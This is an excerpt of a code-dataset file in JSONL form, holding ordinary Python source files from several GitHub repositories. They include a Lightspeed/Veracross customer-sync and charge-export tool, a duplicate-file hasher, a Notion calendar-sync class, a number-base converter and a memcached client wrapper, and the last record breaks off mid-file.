i['nick_first_name']\n elif 'first_nick_name' in i:\n vc_formatted['Customer']['firstName'] = i['first_nick_name']\n\n # Did we find a record in Lighspeed to sync to?\n if check_current:\n\n # Create two dictionaries one for VC and the other for LS\n # We will see if they match later.\n vc_person = dict()\n ls_customer = dict()\n\n # Format VC Data for comparison\n vc_person[\"personpk\"] = str(i[\"person_pk\"])\n vc_person[\"last_name\"] = i[\"last_name\"]\n if 'nick_first_name' in i:\n vc_person[\"first_name\"] = i['nick_first_name']\n elif 'first_nick_name' in i:\n vc_person[\"first_name\"] = i['first_nick_name']\n\n # Handle missing email\n if i[\"email_1\"] is None:\n vc_person[\"email\"] = ''\n else:\n vc_person[\"email\"] = i[\"email_1\"]\n\n vc_person[\"address_1\"] = h[\"address_1\"]\n if h[\"address_2\"] is None:\n vc_person[\"address_2\"] = ''\n else:\n vc_person[\"address_2\"] = h[\"address_2\"]\n vc_person[\"city\"] = h[\"city\"]\n vc_person[\"zip\"] = h[\"postal_code\"]\n vc_person[\"state\"] = h[\"state_province\"]\n\n # Format LS Data for comparison\n try:\n ls_customer[\"personpk\"] = str(check_current[\"Customer\"][\"Contact\"][\"custom\"])\n except:\n ls_customer[\"personpk\"] = \"\"\n\n ls_customer[\"last_name\"] = check_current[\"Customer\"][\"lastName\"]\n ls_customer[\"first_name\"] = check_current[\"Customer\"][\"firstName\"]\n\n # Handle missing email addresses.\n try:\n ls_customer[\"email\"] = check_current[\"Customer\"][\"Contact\"][\"Emails\"][\"ContactEmail\"][\"address\"]\n except:\n ls_customer[\"email\"] = ''\n\n # Handle missing mailing addresses\n try:\n ls_customer[\"address_1\"] = check_current[\"Customer\"][\"Contact\"][\"Addresses\"][\"ContactAddress\"][\n \"address1\"]\n ls_customer[\"address_2\"] = check_current[\"Customer\"][\"Contact\"][\"Addresses\"][\"ContactAddress\"][\n \"address2\"]\n ls_customer[\"city\"] = check_current[\"Customer\"][\"Contact\"][\"Addresses\"][\"ContactAddress\"][\"city\"]\n ls_customer[\"zip\"] = check_current[\"Customer\"][\"Contact\"][\"Addresses\"][\"ContactAddress\"][\"zip\"]\n ls_customer[\"state\"] = check_current[\"Customer\"][\"Contact\"][\"Addresses\"][\"ContactAddress\"][\"state\"]\n except:\n ls_customer[\"address_1\"] = ''\n ls_customer[\"address_2\"] = ''\n ls_customer[\"city\"] = ''\n ls_customer[\"zip\"] = ''\n ls_customer[\"state\"] = ''\n\n # Compare the data. Are the two dictionaries the same...\n if operation_json[\"sync_force\"]:\n force = True\n applogs.info(\"Force sync enabled.\")\n else:\n force = False\n\n if not ls_customer == vc_person or force:\n applogs.info(\"Updating customer {} {}.\".format(vc_formatted['Customer']['firstName'],\n vc_formatted['Customer']['lastName']))\n vc_formatted['Customer']['customerID'] = check_current['Customer']['customerID']\n # applogs.info(vc_formatted[\"Customer\"])\n ls.update(\"Customer/\" + vc_formatted['Customer']['customerID'], vc_formatted[\"Customer\"])\n else:\n applogs.info(\"Record {} {} already up to date.\".format(\n vc_formatted['Customer']['firstName'],\n vc_formatted['Customer']['lastName']))\n else:\n # Add new user when not found in LS\n applogs.info(\"Adding new Lightspeed Customer for {} {}\".format(\n vc_formatted['Customer']['firstName'],\n vc_formatted['Customer']['lastName']))\n try:\n new_customer = ls.create(\"Customer\", vc_formatted[\"Customer\"])\n applogs.info(\"New Customer # {} Added: {} {}\".format(\n new_customer['Customer']['customerID'],\n new_customer['Customer']['firstName'],\n new_customer['Customer']['lastName']))\n except:\n applogs.info(\"Unable to add new Lightspeed Customer for {} {}\".format(\n vc_formatted['Customer']['firstName'],\n vc_formatted['Customer']['lastName']))\n\n\ndef get_payment_types(lightspeed_connection):\n ls_payment_types = dict()\n\n try:\n pt = lightspeed_connection.get(\"PaymentType\")\n for i in pt['PaymentType']:\n ls_payment_types[i[\"name\"]] = i[\"paymentTypeID\"]\n return ls_payment_types\n except:\n applogs.info(\"Cannot get payment types from API.\")\n\n\ndef get_shops(lightspeed_connection):\n ls_shops = dict()\n try:\n shop = lightspeed_connection.get(\"Shop\")\n if isinstance(shop['Shop'], list):\n for s in shop['Shop']:\n ls_shops[s[\"name\"]] = s\n else:\n ls_shops[shop[\"Shop\"][\"name\"]] = shop['Shop']\n return ls_shops\n\n except:\n applogs.info(\"Error getting shop names.\")\n sys.exit(2)\n\n\ndef roundup_decimal(x):\n \"\"\"\n Self-Explanatory\n :param x: rounded up decimal to two places.\n :return:\n \"\"\"\n return x.quantize(Decimal(\".01\"), rounding=ROUND_HALF_UP)\n\n\ndef get_employees(lightspeed_connection):\n employees = dict()\n try:\n emp = lightspeed_connection.get(\"Employee\")\n if isinstance(emp['Employee'], list):\n for s in emp['Employee']:\n name = s[\"firstName\"] + \" \" + s[\"lastName\"]\n employees[name] = s[\"employeeID\"]\n else:\n name = emp[\"Shop\"][\"firstName\"] + \" \" + emp[\"Shop\"][\"lastName\"]\n employees[name] = emp[\"Shop\"][\"employeeID\"]\n\n return employees\n except:\n applogs.info(\"Error getting employees from LS.\")\n sys.exit(2)\n\n\ndef clear_account_balances(lightspeed_connection, customerID, balance, paymentID, creditAccountID, emp_id):\n try:\n formatted_request = {\n \"employeeID\": emp_id,\n \"registerID\": 1,\n \"shopID\": 1,\n \"customerID\": customerID,\n \"completed\": 'true',\n \"SaleLines\": {\n \"SaleLine\": {\n \"itemID\": 0,\n \"note\": \"Balance Cleared by LSVCConnector\",\n \"unitQuantity\": 1,\n \"unitPrice\": -float(balance),\n \"taxClassID\": 0,\n \"avgCost\": 0,\n \"fifoCost\": 0\n }\n },\n \"SalePayments\": {\n \"SalePayment\": {\n \"amount\": -float(balance),\n \"paymentTypeID\": paymentID,\n \"creditAccountID\": creditAccountID\n }\n }\n }\n except:\n applogs.info(\"Unable to format data to clear balances. Data missing?\")\n\n try:\n lightspeed_connection.create('Sale', data=formatted_request)\n applogs.info(\"Cleared balance of {} of customerID {}\".format(str(balance), str(customerID)))\n except:\n applogs.info(\"Unable to clear balance for customerID {}. Request follows.\".format(str(customerID)))\n applogs.info(formatted_request)\n\n\ndef export_charge_balance(config, operation_json):\n \"\"\"\n Export Charges from LS in CSV\n :return:\n \"\"\"\n c = config\n ls = lightspeed_api.Lightspeed(c)\n\n current_store = operation_json[\"export_shop\"]\n ls_shops = get_shops(ls)\n\n # Set current Timezone\n shop_timezone_name = ls_shops[current_store][\"timeZone\"]\n timezone = pytz.timezone(shop_timezone_name)\n shop_timezone_utc_offset = datetime.datetime.now(timezone).strftime('%z')\n shop_timezone_utc_offset_iso = shop_timezone_utc_offset[:3] + \":\" + shop_timezone_utc_offset[3:]\n applogs.info(\n \"Found %s timezone for shop named %s.\" % (shop_timezone_name, ls_shops[current_store][\"name\"]))\n\n # Customer Type\n ct = operation_json[\"type\"]\n try:\n ls_customer_types = get_ls_customer_types(ls)\n ls_customerTypeID = ls_customer_types[ct]\n except:\n applogs.info(\"Unable to assign customer type from Lightspeed\")\n sys.exit(2)\n\n applogs.info(\"Filtering results to customerType %s, id %s\" % (ct, ls_customerTypeID))\n\n # Get selected shop\n shop = operation_json[\"export_shop\"]\n shop_id = ls_shops[shop]['shopID']\n applogs.info(\"Filtering results to shop %s, id %s\" % (shop, shop_id))\n\n # Are we clearing charges?\n try:\n if operation_json[\"export_clear_charges\"]:\n pt = operation_json[\"export_clear_payment_type\"]\n ls_payment_types = get_payment_types(ls)\n pt_id = ls_payment_types[pt]\n except:\n applogs.info(\"Not clearing charges. Missing export_clear_charges or export_clear_payment_type from json.\")\n\n # Ensure there is an export location\n try:\n if os.path.isdir(operation_json[\"export_path\"]):\n applogs.info(\"Exporting to %s\" % (operation_json[\"export_path\"]))\n except:\n applogs.info(\"Missing export_path in json.\")\n\n # !! Sale Line Export !!\n\n # Export SaleLine Data\n try:\n begin_date = operation_json[\"export_date_begin\"]\n # begin_date = begin_date.toPyDate()\n except:\n applogs.info(\"Missing export_date_begin in json.\")\n\n # get begin and end dates\n try:\n end_date = operation_json[\"export_date_end\"]\n # end_date = end_date.toPyDate()\n except:\n applogs.info(\"Missing export_date_end in json.\")\n\n # Check date format.\n if len(str(begin_date)) != 10 or len(str(end_date)) != 10:\n applogs.info(\"Invalid begin or end date. Must be in format YYYY-MM-DD.\")\n sys.exit(2)\n\n try:\n parameters = {}\n parameters['load_relations'] = 'all'\n parameters['completed'] = 'true'\n parameters['timeStamp'] = '{},{}T00:00:00-04:00,{}T23:59:59{}'.format(\"><\",\n begin_date,\n end_date,\n shop_timezone_utc_offset_iso)\n applogs.info(\"Querying Lightspeed \\\"Sales\\\" data point with parameters \" + str(parameters))\n salelines = ls.get(\"Sale\", parameters=parameters)\n except:\n salelines = None\n applogs.info(\"Unable to get SaleLine data.\")\n sys.exit(2)\n\n saleline_export_data = []\n\n # throw down some headers.\n f = ['person_id',\n 'customer_account_number',\n 'customer_name',\n 'transaction_source',\n 'transaction_type',\n 'school_year',\n 'item_date',\n 'catalog_item_fk',\n 'description',\n 'quantity',\n 'unit_price',\n 'purchase_amount',\n 'tax_amount',\n 'total_amount',\n 'pos_transaction_id'\n ]\n\n saleline_export_data.append(f)\n\n for i in salelines['Sale']:\n\n # Does this invoice have a payment that is on account.\n on_account = False\n\n if 'SalePayments' in i:\n if isinstance(i['SalePayments']['SalePayment'], list):\n for p in i['SalePayments']['SalePayment']:\n if p['PaymentType']['code'] == 'SCA':\n on_account = True\n else:\n if i['SalePayments']['SalePayment']['PaymentType']['code'] == 'SCA':\n on_account = True\n\n if 'SaleLines' in i and on_account is True:\n\n # Check this is a customer we requested.\n if i['Customer']['customerTypeID'] != ls_customerTypeID:\n continue\n\n # Verify there are not mixed payments with on credit account\n if isinstance(i['SalePayments']['SalePayment'], list):\n for p in i['SalePayments']['SalePayment']:\n if p['PaymentType']['code'] == 'SCA':\n # Skip sales that mix payments with on_account\n applogs.info(\"Skipping Sale #%s (%s %s): Other payments mixed with On Account.\" %\n (str(i['saleID']),\n str(i['Customer']['firstName']),\n str(i['Customer']['lastName'])))\n continue\n\n # Depending on how many items sold,\n # types of salelines are returned.\n # List of dictionaries and a single dictionary.\n # Is this multiline sale?\n if isinstance(i['SaleLines']['SaleLine'], list):\n\n for s in i['SaleLines']['SaleLine']:\n\n # Ignore this entry if it was not in the shop selected.\n try:\n if s['shopID'] != shop_id:\n # applogs.info(\"ShopID for entry is not the shop that was requested, \"\n # \"skipping entry: %s\" % str(s))\n continue\n except:\n applogs.info(\"Unable to determine shopID for entry: %s.\" % s)\n continue\n\n # Determine correct item description to use:\n try:\n if 'Item' in s:\n if 'description' in s['Item']:\n description = str(s['Item']['description'])\n else:\n description = \"Unknown\"\n elif 'Note' in s:\n if 'note' in s['Note']:\n description = str(s['Note']['note'])\n applogs.info(\"Debug Output: Sale line without actual item: \" +\n str(description))\n else:\n description = \"Unknown\"\n except:\n description = \"Unknown\"\n\n # Format the entry to be added to our export file.\n try:\n\n saleline_single = [str(i['Customer']['companyRegistrationNumber']),\n str(i['Customer']['companyRegistrationNumber']),\n str(i['Customer']['firstName'] + \" \" + i['Customer']['lastName']),\n operation_json[\"export_options_transaction_source\"],\n operation_json[\"export_options_transaction_type\"],\n operation_json[\"export_options_school_year\"],\n str(i['timeStamp'][:10]),\n operation_json[\"export_options_catalog_item\"],\n str(description),\n str(s['unitQuantity']),\n Decimal(s['unitPrice']) -\n (Decimal(s['calcLineDiscount']) / int(s['unitQuantity'])),\n Decimal(s['displayableSubtotal']),\n roundup_decimal(Decimal(s['calcTax1'])),\n roundup_decimal(Decimal(s['calcTotal'])),\n str(i['saleID'])\n ]\n\n saleline_export_data.append(saleline_single)\n except:\n applogs.info(\"Unable to append item (multisale) %s for Sale %s data to CSV.\" %\n (str(s['saleLineID']), str(i['saleID'])))\n applogs.info(\"Debug Output: \" + str(s))\n else:\n try:\n # Is this a singleline sale?\n if 'Item' in i[\"SaleLines\"][\"SaleLine\"]:\n # Need to be able to identify the item by it's type and not if it has items.\n # What if only single misc charge? To do this the way we clear balances needs to be change.\n # Ideally we would want a Payment to CC Account.\n # if isinstance(i[\"SaleLines\"][\"SaleLine\"], dict):\n # Ignore this entry if it was not in the shop selected.\n if i[\"SaleLines\"][\"SaleLine\"][\"shopID\"] != shop_id:\n #applogs.info(\"ShopID for entry is not the shop that was requested, \"\n # \"skipping entry: %s\" % str(i[\"SaleLines\"][\"SaleLine\"]))\n continue\n\n # Determine a description\n try:\n if 'Item' in i[\"SaleLines\"][\"SaleLine\"]:\n if 'description' in i[\"SaleLines\"][\"SaleLine\"]['Item']:\n description = str(i[\"SaleLines\"][\"SaleLine\"]['Item']['description'])\n else:\n description = \"Unknown\"\n elif 'Note' in i[\"SaleLines\"][\"SaleLine\"]:\n if 'note' in i[\"SaleLines\"][\"SaleLine\"]['Note']:\n description = str(i[\"SaleLines\"][\"SaleLine\"]['Note']['note'])\n applogs.info(\"Debug Output: Sale line without actual item: \" +\n str(description))\n else:\n description = \"Unknown\"\n except:\n description = \"Unknown\"\n\n # Format the entry to be added to our export file.\n saleline_single = [str(i['Customer']['companyRegistrationNumber']),\n str(i['Customer']['companyRegistrationNumber']),\n str(i['Customer']['firstName'] + \" \" + i['Customer']['lastName']),\n operation_json[\"export_options_transaction_source\"],\n operation_json[\"export_options_transaction_type\"],\n operation_json[\"export_options_school_year\"],\n str(i[\"SaleLines\"][\"SaleLine\"]['timeStamp'][:10]),\n operation_json[\"export_options_catalog_item\"],\n str(description),\n str(i[\"SaleLines\"][\"SaleLine\"]['unitQuantity']),\n Decimal(i[\"SaleLines\"][\"SaleLine\"]['unitPrice']) -\n (Decimal(i[\"SaleLines\"][\"SaleLine\"]['calcLineDiscount']) /\n int(i[\"SaleLines\"][\"SaleLine\"]['unitQuantity'])),\n Decimal(i[\"SaleLines\"][\"SaleLine\"]['displayableSubtotal']),\n roundup_decimal(\n Decimal(i[\"SaleLines\"][\"SaleLine\"]['calcTax1'])),\n roundup_decimal(\n Decimal(i[\"SaleLines\"][\"SaleLine\"]['calcTotal'])),\n str(i['saleID'])\n ]\n\n saleline_export_data.append(saleline_single)\n except:\n applogs.info(\"Unable to append (single) saleline for sale # \" + str(i['saleID']),\n \"info\")\n applogs.info(\"Debug Output: \" + str(i[\"SaleLines\"][\"SaleLine\"]))\n\n try:\n filename = operation_json[\"export_path\"]\n filename = (filename + '/lightspeed_salelines_export_' +\n datetime.datetime.now().strftime('%m%d%Y-%H%m%S') + '.csv')\n applogs.info(str(filename))\n except:\n applogs.info(\"Unable to determine export file.\")\n sys.exit(2)\n\n try:\n with open(filename, 'w') as f:\n write = csv.writer(f)\n write.writerows(saleline_export_data)\n except:\n applogs.info(\"Unable to export salelines file.\")\n sys.exit(2)\n\n # !! Account Balance Export !!\n try:\n # Get Customers with Balance on account. Used to export balances and clear accounts.\n customers = ls.get(\"Customer\", parameters=dict(load_relations='[\"CreditAccount\"]'))\n except:\n applogs.info(\"Unable to get Customer CreditAccount from Lightspeed.\")\n sys.exit(2)\n\n try:\n export_data = []\n\n f = ['first_name',\n 'last_name',\n 'veracross_id',\n 'lightspeed_cust_type',\n 'balance',\n 'lightspeed_cust_num']\n\n export_data.append(f)\n\n # If we are clearing - who is it marked as?\n try:\n emp = get_employees(ls)\n emp_id = emp[operation_json[\"export_clear_charges_employee_name\"]]\n\n except:\n applogs.info(\"Couldn't determine charge clearing employee name. Using ID 1.\")\n emp_id = 1\n\n for i in customers['Customer']:\n if 'CreditAccount' in i:\n if (float(i['CreditAccount']['balance']) > 0) and (int(i['customerTypeID']) == int(ls_customerTypeID)):\n a = [i['firstName'],\n i['lastName'],\n i['companyRegistrationNumber'],\n i['customerTypeID'],\n i['CreditAccount']['balance'],\n i['customerID']]\n export_data.append(a)\n\n if operation_json[\"export_clear_charges\"]:\n\n # Clear the balance for this account\n clear_account_balances(int(i['customerID']),\n float(i['CreditAccount']['balance']),\n int(pt_id),\n int(i[\"creditAccountID\"]),\n int(emp_id))\n\n except:\n applogs.info(\"Failed to format CreditBalance Export data.\")\n sys.exit(2)\n\n try:\n filename = operation_json[\"export_path\"]\n filename = filename + '/lightspeed_balance_export_' + \\\n datetime.datetime.now().strftime('%m%d%Y-%H%m%S') + '.xlsx'\n\n with open(filename, 'w') as f:\n write = csv.writer(f)\n write.writerows(export_data)\n\n except:\n applogs.info(\"Failed to export csv balance data.\")\n sys.exit(2)\n\n\ndef main(argv):\n operation = \"\"\n operation_json = {\n \"type\": \"\",\n \"sync_force\": False,\n \"sync_delete_missing\": False,\n \"sync_filters\": {\n \"after_date\": \"\",\n \"grade_level\": \"\"\n }\n }\n\n try:\n opts, args = getopt.getopt(argv, \"vhoc:j:t:fda:g:l:\", [\n \"version\",\n \"help\",\n \"operation=\",\n \"config=\",\n \"operation_json=\",\n \"type=\",\n \"sync_force\",\n \"sync_delete\",\n \"filter_after_date=\",\n \"filter_grade_level=\",\n \"log_path=\"])\n except getopt.GetoptError:\n print_help()\n sys.exit(2)\n\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n print_help()\n sys.exit()\n elif opt in (\"-v\", \"--version\"):\n print(__version__)\n sys.exit()\n elif opt in (\"-o\", \"--operation\"):\n if arg == \"sync\":\n operation = \"sync\"\n elif arg == \"export\":\n operation = \"export\"\n else:\n print(\"Unknown operation. Use sync or export.\")\n sys.exit()\n elif opt in (\"-c\", \"--config\"):\n config = load_json(arg)\n elif opt in (\"-j\", \"--operation_json\"):\n operation_json = load_json(arg)\n elif opt in (\"-t\", \"--type\"):\n operation_json[\"type\"] = arg\n elif opt in (\"-f\", \"--sync_force\"):\n operation_json[\"sync_force\"] = True\n elif opt in (\"-d\", \"--sync_delete\"):\n operation_json[\"sync_delete_missing\"] = True\n elif opt in (\"-a\", \"--filter_after_date\"):\n operation_json[\"sync_filters\"][\"after_date\"] = arg\n elif opt in (\"-g\", \"--filter_grade_level\"):\n operation_json[\"sync_filters\"][\"grade_level\"] = arg\n elif opt in (\"-l\", \"--log_path\"):\n operation_json[\"log_path\"] = arg\n try:\n # File Log\n logfile = logging.FileHandler(operation_json[\"log_path\"])\n fileformat = logging.Formatter(\"%(asctime)s:%(levelname)s:%(message)s\")\n logfile.setLevel(logging.INFO)\n logfile.setFormatter(fileformat)\n applogs.addHandler(logfile)\n except:\n print(\"Exception occurred while creating log file.\")\n sys.exit(2)\n\n # Sync if there is a config\n if config:\n if operation == \"sync\":\n sync_ls_vc(config, operation_json)\n if operation_json[\"sync_delete_missing\"]:\n delete_customer(config)\n if operation == \"export\":\n export_charge_balance(config, operation_json)\n else:\n applogs.info(\"Parameter config missing.\")\n sys.exit(2)\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n print_help()\n sys.exit(2)\n else:\n main(sys.argv[1:])\n\n","repo_name":"beckf/ls-vc-connector-cmd","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":37414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28070517124","text":"from pathlib import Path as p\nimport typing as tp\n\nimport pydupe.hasher\nfrom pydupe.console import console, spinner\nfrom pydupe.db import PydupeDB\nfrom pydupe.utils import mytimer\n\n\ndef cmd_hash(dbname: p, path: p) -> None:\n assert isinstance(path, p), 'must be of type Pathlib.Path'\n\n t = mytimer() \n pydupe.hasher.clean(dbname)\n with PydupeDB(dbname) as db:\n db.delete_dir(path)\n db.commit()\n number_scanned = pydupe.hasher.scan_files_on_disk_and_insert_stats_in_db(dbname, path)\n with PydupeDB(dbname) as db:\n db.copy_hash_to_table_lookup()\n db.commit()\n number_hashed = pydupe.hasher.rehash_dupes_where_hash_is_NULL(dbname)\n with PydupeDB(dbname) as db:\n db.copy_dir_to_table_permanent(path)\n db.commit()\n\n console.print(\n f\"[green] scanned {number_scanned} and hashed thereof {number_hashed} files in {t.get} sec\")\n\n\n@spinner(console, \"purging database\")\ndef cmd_purge(dbname: p) -> None:\n delfiles: list[p]= []\n with PydupeDB(dbname) as db:\n db.clean_lookup()\n file_gen = db.get_files_in_permanent()\n for item in file_gen:\n f = p(item['filename'])\n if not f.is_file():\n delfiles.append(f)\n for f in delfiles:\n db.delete_file_permanent(f)\n db.commit()\n\ndef cmd_clean(dbname: p) -> None:\n with PydupeDB(dbname) as db:\n db.clean_lookup()\n db.commit()","repo_name":"chsachs/pydupe","sub_path":"pydupe/cmd.py","file_name":"cmd.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5389480935","text":"import datetime\n\nfrom notion.block import CollectionViewBlock\n\nfrom event import Event\n\n\nclass CalendarDatabase:\n _events = []\n\n def __init__(self, block: CollectionViewBlock, parent):\n self.view = block.views[0]\n self.block = block\n self.parent = parent\n self.set_sync_status(\"Running\")\n\n @classmethod\n def search_in_block(cls, block, name):\n for child in block.children.filter(CollectionViewBlock):\n if child.collection is not None:\n if child.title == name:\n return CalendarDatabase(child, parent=block)\n return None\n\n @classmethod\n def create_in_block(cls, parent, name, notion):\n block = parent.children.add_new(CollectionViewBlock)\n target = notion.get_collection(\n notion.create_record(\"collection\", parent=block,\n schema=Event.get_event_schema()))\n view = notion.get_collection_view(\n notion.create_record(\"collection_view\", parent=block,\n type=\"table\"), collection=target)\n view.set(\"collection_id\", target.id)\n block.set(\"collection_id\", target.id)\n block.set(\"view_ids\", [view.id])\n block.title = name\n\n return CalendarDatabase(block, parent=parent)\n\n @classmethod\n def find_or_create(cls, block, name, notion):\n result = cls.search_in_block(block, name)\n if result is None:\n result = cls.create_in_block(block, name, notion)\n return result\n\n @property\n def events(self):\n if not self._events:\n self.refresh_events()\n return self._events\n\n def set_sync_status(self, status):\n print(\"Sync status set to {} for table {}\".format(status, self.parent.title))\n self.parent.last_sync = datetime.datetime.now()\n self.parent.sync_result = status\n\n def refresh_events(self):\n self._events.clear()\n for row in self.view.default_query().execute():\n self._events.append(Event.from_notion_row(row))\n\n def synchronize(self, calendar):\n if calendar is None:\n self.set_sync_status(\"Error (No calendar located)\")\n return\n\n count = 0\n\n for ev in calendar.events:\n cal_event = Event.from_calendar(ev, calendar)\n if cal_event not in self.events:\n cal_event.create_row(self.view.collection)\n count += 1\n\n self.refresh_events()\n self.set_sync_status(\"Success ({} rows added)\".format(count))\n","repo_name":"avra-m3/notion-cal","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"74976543524","text":"import os\n\nos.system(\"color\") #Necessário para que os códigos de cores funcionem no Windows\n\nALGARISMOS = (\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\")\n\n\nclass Cores:\n AMARELO = \"\\033[1;33m\"\n VERDE = \"\\033[1;32m\"\n MAGENTA = \"\\033[1;35m\"\n CIANO = \"\\033[1;36m\"\n AZUL = \"\\033[1;34m\"\n VERMELHO = \"\\033[1;31m\"\n RESET = \"\\033[0;0m\"\n\n\ndef colorir(texto: any, cor: str) -> str:\n return f\"{cor}{texto}{Cores.RESET}\"\n\ndef converter_digito(digito: str) -> int:\n return ALGARISMOS.index(digito.upper())\n\ndef validar_partes(partes: list) -> bool:\n if len(partes) != 2:\n print(colorir(\"\\nDigite o número e a base que ele está: \\n\", Cores.AMARELO))\n return False\n numero: str = partes[0]\n base: str = partes[1]\n if not numero.isalnum():\n print(colorir(\"\\nDigite um número válido\\n\", Cores.VERMELHO))\n return False\n if not base.isnumeric() or int(base) < 2:\n print(colorir(\"\\nDigite uma base válida\\n\", Cores.VERMELHO))\n return False\n if int(base) > 36:\n print(colorir(\"\\nA maior base de conversão é 36\\n\", Cores.AMARELO))\n return False\n for digito in numero:\n if converter_digito(digito) >= int(base):\n print(colorir(f\"\\n{numero} é inválido na base {base}\\n\", Cores.VERMELHO))\n return False\n return True\n\ndef converter_numero(numero: str, base: int) -> int:\n tamanho_do_numero = len(numero) - 1\n resultado = 0\n\n resolucao = \"\\n\"\n for indice, digito in enumerate(numero):\n resultado += converter_digito(digito) * (base ** (tamanho_do_numero - indice))\n resolucao += f\"{digito if digito.isnumeric() else colorir(converter_digito(digito), Cores.AZUL)} * {base}^{tamanho_do_numero - indice} {'+ ' if indice != tamanho_do_numero else ''}\"\n\n print(f\"{resolucao}= {resultado}\\n\")\n print(f\"{colorir(numero, Cores.VERDE)} na base {colorir(base, Cores.MAGENTA)} é {colorir(resultado, Cores.CIANO)} na base 10\\n\")\n\n\nprint(\"Como funciona:\\n\")\n\nprint(\"Digite o número e a base que ele está: \\n\")\n\nprint(\"Exemplo:\\n\")\n\nprint(\"Digite o número e a base que ele está: 200 4\")\n\nconverter_numero(\"200\", 4)\n\nprint(f\"A maior base de conversão possível é {len(ALGARISMOS)}\\n\")\n\nprint(\"Pressione o ENTER sem digitar nada, para sair do programa.\\n\")\n\n\nwhile True:\n escolha = input(\"Digite o número e a base que ele está: \")\n \n if escolha == \"\":\n break\n\n partes = escolha.split(\" \")\n\n if not validar_partes(partes):\n continue\n \n converter_numero(partes[0], int(partes[1]))\n","repo_name":"Faltrenn/Introducao-a-Informatica","sub_path":"cb_n_dec.py","file_name":"cb_n_dec.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75010228963","text":"import os\nimport sys\nimport traceback\nfrom zlib import compress, decompress, error as zlib_error\nfrom cmemcached_imp import *\nimport cmemcached_imp\nimport threading\n\n_FLAG_PICKLE = 1 << 0\n_FLAG_INTEGER = 1 << 1\n_FLAG_LONG = 1 << 2\n_FLAG_BOOL = 1 << 3\n_FLAG_COMPRESS = 1 << 4\n_FLAG_MARSHAL = 1 << 5\n\nVERSION = \"0.41-greenify\"\n\n\ndef prepare(val, comp_threshold):\n val, flag = cmemcached_imp.prepare(val)\n if comp_threshold > 0 and val and len(val) > comp_threshold:\n val = compress(val)\n flag |= _FLAG_COMPRESS\n return val, flag\n\n\ndef restore(val, flag):\n if val is None:\n return val\n\n if flag & _FLAG_COMPRESS:\n try:\n val = decompress(val)\n except zlib_error:\n return None\n flag &= ~_FLAG_COMPRESS\n\n return cmemcached_imp.restore(val, flag)\n\n\nclass ThreadUnsafe(Exception):\n pass\n\n\nclass Client(cmemcached_imp.Client):\n\n \"a wraper around cmemcached_imp\"\n\n def __init__(self, servers, do_split=1, comp_threshold=0, behaviors={}, logger=None, cas_support=False, *a, **kw):\n cmemcached_imp.Client.__init__(self)\n self.servers = servers\n self.do_split = do_split\n self.comp_threshold = comp_threshold\n self.behaviors = dict(behaviors.items())\n self.add_server(servers)\n\n self.set_behavior(BEHAVIOR_NO_BLOCK, 1) # nonblock\n self.set_behavior(BEHAVIOR_TCP_NODELAY, 1) # nonblock\n self.set_behavior(BEHAVIOR_TCP_KEEPALIVE, 1)\n self.set_behavior(BEHAVIOR_CACHE_LOOKUPS, 1)\n # self.set_behavior(BEHAVIOR_BUFFER_REQUESTS, 0) # no request buffer\n\n #self.set_behavior(BEHAVIOR_KETAMA, 1)\n self.set_behavior(BEHAVIOR_HASH, HASH_MD5)\n self.set_behavior(BEHAVIOR_KETAMA_HASH, HASH_MD5)\n self.set_behavior(BEHAVIOR_DISTRIBUTION, DIST_CONSISTENT_KETAMA)\n if cas_support:\n self.set_behavior(BEHAVIOR_SUPPORT_CAS, 1)\n\n for k, v in behaviors.items():\n self.set_behavior(k, v)\n\n self._thread_ident = None\n self._created_stack = traceback.extract_stack()\n\n def __reduce__(self):\n return (Client, (self.servers, self.do_split, self.comp_threshold, self.behaviors))\n\n def set_behavior(self, k, v):\n self.behaviors[k] = v\n return cmemcached_imp.Client.set_behavior(self, k, v)\n\n def set(self, key, val, time=0, compress=True):\n comp = compress and self.comp_threshold or 0\n val, flag = prepare(val, comp)\n if val is not None:\n return self.set_raw(key, val, time, flag)\n else:\n print >>sys.stderr, '[cmemcached]', 'serialize %s failed' % key\n\n def set_raw(self, key, val, time, flag):\n self._record_thread_ident()\n self._check_thread_ident()\n return cmemcached_imp.Client.set_raw(self, key, val, time, flag)\n\n def set_multi(self, values, time=0, compress=True, return_failure=False):\n self._record_thread_ident()\n self._check_thread_ident()\n comp = compress and self.comp_threshold or 0\n raw_values = dict((k, prepare(v, comp)) for k, v in values.iteritems())\n return self.set_multi_raw(raw_values, time, return_failure=return_failure)\n\n def get(self, key):\n self._record_thread_ident()\n val, flag = cmemcached_imp.Client.get_raw(self, key)\n return restore(val, flag)\n\n def get_multi(self, keys):\n self._record_thread_ident()\n result = cmemcached_imp.Client.get_multi_raw(self, keys)\n return dict((k, restore(v, flag))\n for k, (v, flag) in result.iteritems())\n\n def gets(self, key):\n self._record_thread_ident()\n val, flag, cas = cmemcached_imp.Client.gets_raw(self, key)\n return restore(val, flag), cas\n\n def get_list(self, keys):\n self._record_thread_ident()\n result = self.get_multi(keys)\n return [result.get(key) for key in keys]\n\n def expire(self, key):\n self._record_thread_ident()\n return self.touch(key, -1)\n\n def reset(self):\n self.clear_thread_ident()\n\n def clear_thread_ident(self):\n self._thread_ident = None\n self._thread_ident_stack = None\n\n def _record_thread_ident(self):\n if self._thread_ident is None:\n self._thread_ident = self._get_current_thread_ident()\n\n def _check_thread_ident(self):\n if self._get_current_thread_ident() != self._thread_ident:\n raise ThreadUnsafe(\"mc client created in %s\\n%s, called in %s\" %\n (self._thread_ident,\n self._created_stack,\n 